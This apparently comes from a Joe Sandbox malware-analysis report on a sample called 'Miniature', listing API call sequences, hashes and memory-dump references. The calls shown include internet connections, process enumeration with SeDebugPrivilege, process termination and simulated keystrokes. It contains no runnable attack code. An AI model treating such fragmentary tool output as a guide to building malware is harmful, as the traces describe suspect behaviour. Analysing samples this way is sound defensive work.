                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 432a86c30c6c4a2fc5404bc2583be86f6ca8073b16a28d51cde447b9d24ae1cb
                                                                                                                                                                                                                                                                                            • Instruction ID: c37418a46d656da309589f951699ae19334ada3850aa7963584426b6f7c29ea1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 432a86c30c6c4a2fc5404bc2583be86f6ca8073b16a28d51cde447b9d24ae1cb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5612571A04301AFDB36BF74DC82BAE7BA4BF01320F0405ADFD56AB291D6759E009791
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00CA5C24
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00CA5C65
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 00CA5C6B
                                                                                                                                                                                                                                                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00CA5C6F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA79F2: DeleteObject.GDI32(00000000), ref: 00CA7A1E
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA5CAB
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CA5CB8
                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CA5CEB
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00CA5D25
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00CA5D34
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ea4f9571e76ea8d38db303d1ca722ff2e551611e105dbaf9d63a1ca1923f9885
                                                                                                                                                                                                                                                                                            • Instruction ID: 1805718e643d6385a7c6e6753583a2f34ed656fdc38991b8946f76997d5cebfa
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea4f9571e76ea8d38db303d1ca722ff2e551611e105dbaf9d63a1ca1923f9885
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5051C330A40A0ABFEF249F15CC49BD83B65FB0776DF14C111F6259A1E1C7769A84EB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00C528D1
                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00C528EA
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C528FA
                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00C52912
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C52933
                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C111F5,00000000,00000000,00000000,000000FF,00000000), ref: 00C52942
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C5295F
                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C111F5,00000000,00000000,00000000,000000FF,00000000), ref: 00C5296E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e8bad19b737ec52bd0775716191d81cc04b7fe264d7302adab736bf6680bfab7
                                                                                                                                                                                                                                                                                            • Instruction ID: 239041cbf81a08e103954592eb93d260b73f423250be0965273d734084a4b3b8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8bad19b737ec52bd0775716191d81cc04b7fe264d7302adab736bf6680bfab7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38519A74600209AFDB24CF25CC81BAE7BF5FF4A724F144518FA52972A0D770EA80EB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C8CBC7
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C8CBDA
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 00C8CBEE
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8CCB7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8CC98: GetLastError.KERNEL32 ref: 00C8CD67
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8CC98: SetEvent.KERNEL32(?), ref: 00C8CD7B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8CC98: InternetCloseHandle.WININET(00000000), ref: 00C8CD86
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 337547030-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 27d9d25c3d1ddb39bfbdf8d065aff8d5102fd4bbc006cbb36eb86ae85c123871
                                                                                                                                                                                                                                                                                            • Instruction ID: 552afb4f328bcf109af808c51791d812f856806700851ef99187e129fe3663b8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27d9d25c3d1ddb39bfbdf8d065aff8d5102fd4bbc006cbb36eb86ae85c123871
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63315971500B05AFDB21AF619984B7ABBB8FF45308B04852DF86B83A10C731E914AB64
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C743AD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: GetCurrentThreadId.KERNEL32 ref: 00C743B4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C72F00), ref: 00C743BB
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C72F0A
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C72F28
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C72F2C
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C72F36
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C72F4E
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C72F52
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C72F5C
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C72F70
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C72F74
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f41c4af1aa7ff2ccf20ec83ff14a94c23d27da2ded7581d1d7f962f058538e0b
                                                                                                                                                                                                                                                                                            • Instruction ID: 3ce9b4364327ed0c02394f2faa27d74eb8dcb6f25301c14d9da008ed0a75388b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f41c4af1aa7ff2ccf20ec83ff14a94c23d27da2ded7581d1d7f962f058538e0b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E01D430784220BBFB1067A99C8AF5D3F5ADB4EB25F100011F31EAF1E0C9E264459EA9
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C71D95,?,?,00000000), ref: 00C72159
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00C71D95,?,?,00000000), ref: 00C72160
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C71D95,?,?,00000000), ref: 00C72175
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00C71D95,?,?,00000000), ref: 00C7217D
                                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00C71D95,?,?,00000000), ref: 00C72180
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C71D95,?,?,00000000), ref: 00C72190
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00C71D95,00000000,?,00C71D95,?,?,00000000), ref: 00C72198
                                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00C71D95,?,?,00000000), ref: 00C7219B
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00C721C1,00000000,00000000,00000000), ref: 00C721B5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0c054b4ed36bcc07d480ea6ff2292b4fed67c271559a94dbe52042eefc9ad060
                                                                                                                                                                                                                                                                                            • Instruction ID: 1a9e404105722cc12be3b6845ca89cd389f6b9cd36ef028b7c852c310a3abd85
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c054b4ed36bcc07d480ea6ff2292b4fed67c271559a94dbe52042eefc9ad060
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8201A8B5240304BFEA10ABA5DC49F6F7BACEB89715F418411FA06DB5A1DA709800CA20
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00C7DDAC
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00C7DDBA
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DD87: CloseHandle.KERNEL32(00000000), ref: 00C7DE87
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9ABCA
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C9ABDD
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9AC10
                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C9ACC5
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00C9ACD0
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C9AD21
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CA43C1
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00CA43D6
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CA43F0
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA4435
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CA4462
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CA4490
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                            • String ID: SysListView32
                                                                                                                                                                                                                                                                                            • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C7C6C4
                                                                                                                                                                                                                                                                                            • IsMenu.USER32(00000000), ref: 00C7C6E4
                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00C7C71A
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(01946320), ref: 00C7C76B
                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(01946320,?,00000001,00000030), ref: 00C7C793
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                            • String ID: 0$2
                                                                                                                                                                                                                                                                                            • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00C7D1BE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconLoad
                                                                                                                                                                                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                            • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                            • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                            • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C6E785
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C6E797
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C6E7BD
                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C6E7D4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                                                                                                                                                                                            • String ID: GetSystemWow64DirectoryW$X64$kernel32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 582185067-2904798639
                                                                                                                                                                                                                                                                                            • Opcode ID: 97a4f215ae38241b598684d0429db606961a4fcc6a0dec18e5ea84fae86be347
                                                                                                                                                                                                                                                                                            • Instruction ID: ffd6b0e5aafb1a737f4fda10ec56e5c3ae39f8cdc6b05e95615b5abbe4d35535
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97a4f215ae38241b598684d0429db606961a4fcc6a0dec18e5ea84fae86be347
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20F0BE79912239DBD6759B64CCC8FAE32286B22B05F1500A6F603E2490DB70CE048A51
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5048fb7a093b7a55c87eb16c4d68a43aaf376288a39520b34397e1f25a79d7bf
                                                                                                                                                                                                                                                                                            • Instruction ID: 768c7f55de336d17fc23f6ab36be27df5ac4713b1023ad0d5dc2012a18927f9c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5048fb7a093b7a55c87eb16c4d68a43aaf376288a39520b34397e1f25a79d7bf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD419165C21214B5CB15EBB8DC8BACFB7B8AF05310F508866F519E3121FA34E256C3A6
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C539E2,00000004,00000000,00000000), ref: 00C2FC41
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00C539E2,00000004,00000000,00000000), ref: 00C6FC15
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C539E2,00000004,00000000,00000000), ref: 00C6FC98
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ShowWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 95ba10ae240c2d6bc7a7ace68cac7c5a16cfd197d3c5195f2a1277dc9711bb22
                                                                                                                                                                                                                                                                                            • Instruction ID: 87ecdfb21cb2e9f07fce0c3afa9b231e3e902221eed83024872ecdf8ee693cd5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95ba10ae240c2d6bc7a7ace68cac7c5a16cfd197d3c5195f2a1277dc9711bb22
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7941273060839CAAC7398B39E9D8B7E3FB5AB87310F14453CE96757E60C671A982D711
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00CA37B7
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00CA37BF
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CA37CA
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00CA37D6
                                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00CA3812
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CA3823
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CA6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00CA385E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CA387D
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f29131a47f6979105dc7339016540e5c6a477c145fdb6b65a7935879fe80a92b
                                                                                                                                                                                                                                                                                            • Instruction ID: 416ff6b996306348c36e175548a7350565cc41edcf50982d3736b2b8fe568eab
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f29131a47f6979105dc7339016540e5c6a477c145fdb6b65a7935879fe80a92b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F319C72201214BFEB158F50CC89FEB3BA9EF4A759F044065FE0ADB291C6B59D41C7A0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
